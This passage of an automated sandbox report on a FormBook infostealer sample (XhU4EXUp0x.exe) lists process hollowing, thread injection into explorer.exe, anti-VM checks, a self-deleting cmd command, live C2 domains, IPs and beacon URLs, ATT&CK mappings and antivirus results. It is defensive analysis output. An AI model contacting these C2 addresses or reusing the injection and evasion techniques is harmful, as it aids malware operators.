          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B34D3B mov eax, dword ptr fs:[00000030h]12_2_04B34D3B
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BD8D34 mov eax, dword ptr fs:[00000030h]12_2_04BD8D34
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B8A537 mov eax, dword ptr fs:[00000030h]12_2_04B8A537
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B2C577 mov eax, dword ptr fs:[00000030h]12_2_04B2C577
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B2C577 mov eax, dword ptr fs:[00000030h]12_2_04B2C577
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B27D50 mov eax, dword ptr fs:[00000030h]12_2_04B27D50
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B43D43 mov eax, dword ptr fs:[00000030h]12_2_04B43D43
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B83540 mov eax, dword ptr fs:[00000030h]12_2_04B83540
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BB3D40 mov eax, dword ptr fs:[00000030h]12_2_04BB3D40
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BD0EA5 mov eax, dword ptr fs:[00000030h]12_2_04BD0EA5
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BD0EA5 mov eax, dword ptr fs:[00000030h]12_2_04BD0EA5
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BD0EA5 mov eax, dword ptr fs:[00000030h]12_2_04BD0EA5
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B846A7 mov eax, dword ptr fs:[00000030h]12_2_04B846A7
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B9FE87 mov eax, dword ptr fs:[00000030h]12_2_04B9FE87
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B316E0 mov ecx, dword ptr fs:[00000030h]12_2_04B316E0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B176E2 mov eax, dword ptr fs:[00000030h]12_2_04B176E2
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BD8ED6 mov eax, dword ptr fs:[00000030h]12_2_04BD8ED6
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B48EC7 mov eax, dword ptr fs:[00000030h]12_2_04B48EC7
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BBFEC0 mov eax, dword ptr fs:[00000030h]12_2_04BBFEC0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B336CC mov eax, dword ptr fs:[00000030h]12_2_04B336CC
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BBFE3F mov eax, dword ptr fs:[00000030h]12_2_04BBFE3F
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B0E620 mov eax, dword ptr fs:[00000030h]12_2_04B0E620
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B3A61C mov eax, dword ptr fs:[00000030h]12_2_04B3A61C
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B3A61C mov eax, dword ptr fs:[00000030h]12_2_04B3A61C
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B0C600 mov eax, dword ptr fs:[00000030h]12_2_04B0C600
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B0C600 mov eax, dword ptr fs:[00000030h]12_2_04B0C600
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B0C600 mov eax, dword ptr fs:[00000030h]12_2_04B0C600
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B38E00 mov eax, dword ptr fs:[00000030h]12_2_04B38E00
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BC1608 mov eax, dword ptr fs:[00000030h]12_2_04BC1608
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B2AE73 mov eax, dword ptr fs:[00000030h]12_2_04B2AE73
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B2AE73 mov eax, dword ptr fs:[00000030h]12_2_04B2AE73
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B2AE73 mov eax, dword ptr fs:[00000030h]12_2_04B2AE73
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B2AE73 mov eax, dword ptr fs:[00000030h]12_2_04B2AE73
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B2AE73 mov eax, dword ptr fs:[00000030h]12_2_04B2AE73
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B1766D mov eax, dword ptr fs:[00000030h]12_2_04B1766D
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B17E41 mov eax, dword ptr fs:[00000030h]12_2_04B17E41
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B17E41 mov eax, dword ptr fs:[00000030h]12_2_04B17E41
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B17E41 mov eax, dword ptr fs:[00000030h]12_2_04B17E41
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B17E41 mov eax, dword ptr fs:[00000030h]12_2_04B17E41
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B17E41 mov eax, dword ptr fs:[00000030h]12_2_04B17E41
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B17E41 mov eax, dword ptr fs:[00000030h]12_2_04B17E41
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BCAE44 mov eax, dword ptr fs:[00000030h]12_2_04BCAE44
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BCAE44 mov eax, dword ptr fs:[00000030h]12_2_04BCAE44
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B18794 mov eax, dword ptr fs:[00000030h]12_2_04B18794
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B87794 mov eax, dword ptr fs:[00000030h]12_2_04B87794
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B87794 mov eax, dword ptr fs:[00000030h]12_2_04B87794
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B87794 mov eax, dword ptr fs:[00000030h]12_2_04B87794
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B437F5 mov eax, dword ptr fs:[00000030h]12_2_04B437F5
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B3E730 mov eax, dword ptr fs:[00000030h]12_2_04B3E730
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B2B73D mov eax, dword ptr fs:[00000030h]12_2_04B2B73D
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B2B73D mov eax, dword ptr fs:[00000030h]12_2_04B2B73D
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B04F2E mov eax, dword ptr fs:[00000030h]12_2_04B04F2E
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B04F2E mov eax, dword ptr fs:[00000030h]12_2_04B04F2E
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B2F716 mov eax, dword ptr fs:[00000030h]12_2_04B2F716
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B9FF10 mov eax, dword ptr fs:[00000030h]12_2_04B9FF10
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\raserver.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.gentrypartyof8.com
          Source: C:\Windows\explorer.exeDomain query: www.rsyueda.com
          Source: C:\Windows\explorer.exeNetwork Connect: 23.82.229.132 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 66.235.200.146 80Jump to behavior
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeSection loaded: unknown target: C:\Windows\SysWOW64\raserver.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeSection loaded: unknown target: C:\Windows\SysWOW64\raserver.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\raserver.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\raserver.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeThread register set: target process: 3424Jump to behavior
          Source: C:\Windows\SysWOW64\raserver.exeThread register set: target process: 3424Jump to behavior
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeSection unmapped: C:\Windows\SysWOW64\raserver.exe base address: 1370000Jump to behavior
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeProcess created: C:\Users\user\Desktop\XhU4EXUp0x.exe C:\Users\user\Desktop\XhU4EXUp0x.exeJump to behavior
          Source: C:\Windows\SysWOW64\raserver.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\XhU4EXUp0x.exe'Jump to behavior
          Source: explorer.exe, 00000005.00000000.657818054.0000000000AD8000.00000004.00000020.sdmpBinary or memory string: ProgmanMD6
          Source: explorer.exe, 00000005.00000000.689362346.0000000001080000.00000002.00000001.sdmp, raserver.exe, 0000000C.00000002.912634794.0000000003390000.00000002.00000001.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 00000005.00000000.669694519.0000000005E50000.00000004.00000001.sdmp, raserver.exe, 0000000C.00000002.912634794.0000000003390000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000005.00000000.689362346.0000000001080000.00000002.00000001.sdmp, raserver.exe, 0000000C.00000002.912634794.0000000003390000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000005.00000000.689362346.0000000001080000.00000002.00000001.sdmp, raserver.exe, 0000000C.00000002.912634794.0000000003390000.00000002.00000001.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 00000005.00000000.677547132.000000000A716000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWnd5D
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeQueries volume information: C:\Users\user\Desktop\XhU4EXUp0x.exe VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000003.00000002.707404802.00000000015D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.652221131.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.911907238.0000000000A90000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.912137473.0000000000E80000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.912162573.0000000000EB0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.655856649.00000000037F7000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.706990052.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.654291332.00000000036B9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.707426607.0000000001600000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 3.2.XhU4EXUp0x.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.XhU4EXUp0x.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.XhU4EXUp0x.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.XhU4EXUp0x.exe.400000.1.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000003.00000002.707404802.00000000015D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.652221131.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.911907238.0000000000A90000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.912137473.0000000000E80000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.912162573.0000000000EB0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.655856649.00000000037F7000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.706990052.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.654291332.00000000036B9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.707426607.0000000001600000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 3.2.XhU4EXUp0x.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.XhU4EXUp0x.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.XhU4EXUp0x.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.XhU4EXUp0x.exe.400000.1.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsWindows Management Instrumentation1Path InterceptionProcess Injection512Rootkit1Credential API Hooking1Security Software Discovery331Remote ServicesCredential API Hooking1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsShared Modules1Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsMasquerading1Input Capture1Process Discovery2Remote Desktop ProtocolInput Capture1Exfiltration Over BluetoothIngress Tool Transfer1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Disable or Modify Tools1Security Account ManagerVirtualization/Sandbox Evasion141SMB/Windows Admin SharesArchive Collected Data1Automated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Virtualization/Sandbox Evasion141NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol12SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptProcess Injection512LSA SecretsSystem Information Discovery112SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonDeobfuscate/Decode Files or Information1Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsObfuscated Files or Information4DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobSoftware Packing3Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 433531 Sample: XhU4EXUp0x.exe Startdate: 12/06/2021 Architecture: WINDOWS Score: 100 36 Found malware configuration 2->36 38 Malicious sample detected (through community Yara rule) 2->38 40 Multi AV Scanner detection for submitted file 2->40 42 6 other signatures 2->42 10 XhU4EXUp0x.exe 3 2->10         started        process3 file4 28 C:\Users\user\AppData\...\XhU4EXUp0x.exe.log, ASCII 10->28 dropped 52 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 10->52 54 Tries to detect virtualization through RDTSC time measurements 10->54 14 XhU4EXUp0x.exe 10->14         started        signatures5 process6 signatures7 56 Modifies the context of a thread in another process (thread injection) 14->56 58 Maps a DLL or memory area into another process 14->58 60 Sample uses process hollowing technique 14->60 62 Queues an APC in another process (thread injection) 14->62 17 explorer.exe 14->17 injected process8 dnsIp9 30 www.rsyueda.com 23.82.229.132, 49765, 80 LEASEWEB-USA-SEA-10US United States 17->30 32 gentrypartyof8.com 66.235.200.146, 49762, 80 CLOUDFLARENETUS United States 17->32 34 www.gentrypartyof8.com 17->34 44 System process connects to network (likely due to code injection or exploit) 17->44 21 raserver.exe 17->21         started        signatures10 process11 signatures12 46 Modifies the context of a thread in another process (thread injection) 21->46 48 Maps a DLL or memory area into another process 21->48 50 Tries to detect virtualization through RDTSC time measurements 21->50 24 cmd.exe 1 21->24         started        process13 process14 26 conhost.exe 24->26         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          XhU4EXUp0x.exe21%VirustotalBrowse
          XhU4EXUp0x.exe26%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
          XhU4EXUp0x.exe100%Joe Sandbox ML

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          3.2.XhU4EXUp0x.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          3.0.XhU4EXUp0x.exe.400000.1.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://www.gentrypartyof8.com/nff/?2dWD=oo8PZR09GamqRkCLHSTg5AKJvm44C+19X1uEOPW4zTuWS3c9RrL+Vx+B8IkF2PxixF5c&7nSX=f2MHEhOHwH0%Avira URL Cloudsafe
          http://www.rsyueda.com/nff/?2dWD=rcekcafpraO0sj/oaoDcLlLwOdzHntpmaKyMQqwrcrTR8fOv+tmqTlrKj/r2WTcjy7/L&7nSX=f2MHEhOHwH0%Avira URL Cloudsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          www.yellow-wink.com/nff/0%Avira URL Cloudsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.rsyueda.com
          23.82.229.132
          truetrue
            unknown
            gentrypartyof8.com
            66.235.200.146
            truetrue
              unknown
              www.gentrypartyof8.com
              unknown
              unknowntrue
                unknown

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://www.gentrypartyof8.com/nff/?2dWD=oo8PZR09GamqRkCLHSTg5AKJvm44C+19X1uEOPW4zTuWS3c9RrL+Vx+B8IkF2PxixF5c&7nSX=f2MHEhOHwHtrue
                • Avira URL Cloud: safe
                unknown
                http://www.rsyueda.com/nff/?2dWD=rcekcafpraO0sj/oaoDcLlLwOdzHntpmaKyMQqwrcrTR8fOv+tmqTlrKj/r2WTcjy7/L&7nSX=f2MHEhOHwHtrue
                • Avira URL Cloud: safe
                unknown
                www.yellow-wink.com/nff/true
                • Avira URL Cloud: safe
                low

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://www.apache.org/licenses/LICENSE-2.0explorer.exe, 00000005.00000000.681251721.000000000B976000.00000002.00000001.sdmpfalse
                  high
                  http://www.fontbureau.comexplorer.exe, 00000005.00000000.681251721.000000000B976000.00000002.00000001.sdmpfalse
                    high
                    http://www.fontbureau.com/designersGexplorer.exe, 00000005.00000000.681251721.000000000B976000.00000002.00000001.sdmpfalse
                      high
                      http://www.fontbureau.com/designers/?explorer.exe, 00000005.00000000.681251721.000000000B976000.00000002.00000001.sdmpfalse
                        high
                        http://www.founder.com.cn/cn/bTheexplorer.exe, 00000005.00000000.681251721.000000000B976000.00000002.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        unknown
                        http://www.fontbureau.com/designers?explorer.exe, 00000005.00000000.681251721.000000000B976000.00000002.00000001.sdmpfalse
                          high
                          http://www.tiro.comexplorer.exe, 00000005.00000000.681251721.000000000B976000.00000002.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          unknown
                          http://www.fontbureau.com/designersexplorer.exe, 00000005.00000000.681251721.000000000B976000.00000002.00000001.sdmpfalse
                            high
                            http://www.goodfont.co.krexplorer.exe, 00000005.00000000.681251721.000000000B976000.00000002.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            unknown
                            https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.cssXhU4EXUp0x.exe, 00000000.00000002.653535453.00000000026EF000.00000004.00000001.sdmpfalse
                              high
                              http://www.carterandcone.comlexplorer.exe, 00000005.00000000.681251721.000000000B976000.00000002.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              unknown
                              http://www.sajatypeworks.comexplorer.exe, 00000005.00000000.681251721.000000000B976000.00000002.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              unknown
                              http://www.typography.netDexplorer.exe, 00000005.00000000.681251721.000000000B976000.00000002.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              unknown
                              http://www.fontbureau.com/designers/cabarga.htmlNexplorer.exe, 00000005.00000000.681251721.000000000B976000.00000002.00000001.sdmpfalse
                                high
                                http://www.founder.com.cn/cn/cTheexplorer.exe, 00000005.00000000.681251721.000000000B976000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                http://www.galapagosdesign.com/staff/dennis.htmexplorer.exe, 00000005.00000000.681251721.000000000B976000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                http://fontfabrik.comexplorer.exe, 00000005.00000000.681251721.000000000B976000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                http://www.founder.com.cn/cnexplorer.exe, 00000005.00000000.681251721.000000000B976000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                http://www.fontbureau.com/designers/frere-user.htmlexplorer.exe, 00000005.00000000.681251721.000000000B976000.00000002.00000001.sdmpfalse
                                  high
                                  http://www.jiyu-kobo.co.jp/explorer.exe, 00000005.00000000.681251721.000000000B976000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  http://www.galapagosdesign.com/DPleaseexplorer.exe, 00000005.00000000.681251721.000000000B976000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  http://www.fontbureau.com/designers8explorer.exe, 00000005.00000000.681251721.000000000B976000.00000002.00000001.sdmpfalse
                                    high
                                    http://www.%s.comPAexplorer.exe, 00000005.00000000.660621066.0000000002B50000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    low
                                    http://www.fonts.comexplorer.exe, 00000005.00000000.681251721.000000000B976000.00000002.00000001.sdmpfalse
                                      high
                                      http://www.sandoll.co.krexplorer.exe, 00000005.00000000.681251721.000000000B976000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      unknown
                                      http://www.urwpp.deDPleaseexplorer.exe, 00000005.00000000.681251721.000000000B976000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      unknown
                                      http://www.zhongyicts.com.cnexplorer.exe, 00000005.00000000.681251721.000000000B976000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
